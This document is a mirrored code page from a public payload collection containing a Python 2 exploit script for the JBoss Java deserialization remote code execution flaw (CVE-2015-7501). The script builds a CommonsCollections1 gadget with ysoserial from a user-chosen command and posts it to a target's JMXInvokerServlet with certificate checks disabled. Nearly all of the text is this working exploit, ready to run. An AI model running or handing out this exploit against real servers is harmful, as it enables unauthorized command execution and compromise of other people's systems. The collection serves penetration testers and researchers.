mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
62 lines
1.9 KiB
Python
62 lines
1.9 KiB
Python
#! /usr/bin/env python2
|
|
|
|
# Jboss Java Deserialization RCE (CVE-2015-7501)
|
|
# Made with <3 by @byt3bl33d3r
|
|
|
|
from __future__ import print_function
|
|
import requests
|
|
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
|
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
|
|
|
import argparse
|
|
import sys, os
|
|
#from binascii import hexlify, unhexlify
|
|
from subprocess import check_output
|
|
|
|
ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
|
|
ysoserial_path = None
|
|
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument('target', type=str, help='Target IP')
|
|
parser.add_argument('command', type=str, help='Command to run on target')
|
|
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
|
|
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
|
|
|
|
if len(sys.argv) < 2:
|
|
parser.print_help()
|
|
sys.exit(1)
|
|
|
|
args = parser.parse_args()
|
|
|
|
if not args.ysoserial_path:
|
|
for path in ysoserial_default_paths:
|
|
if os.path.exists(path):
|
|
ysoserial_path = path
|
|
else:
|
|
if os.path.exists(args.ysoserial_path):
|
|
ysoserial_path = args.ysoserial_path
|
|
|
|
if ysoserial_path is None:
|
|
print('[-] Could not find ysoserial JAR file')
|
|
sys.exit(1)
|
|
|
|
if len(args.target.split(":")) != 2:
|
|
print('[-] Target must be in format IP:PORT')
|
|
sys.exit(1)
|
|
|
|
if not args.command:
|
|
print('[-] You must specify a command to run')
|
|
sys.exit(1)
|
|
|
|
ip, port = args.target.split(':')
|
|
|
|
print('[*] Target IP: {}'.format(ip))
|
|
print('[*] Target PORT: {}'.format(port))
|
|
|
|
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
|
|
|
|
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
|
|
|
|
if r.status_code == 200:
|
|
print('[+] Command executed successfully')
|
|
|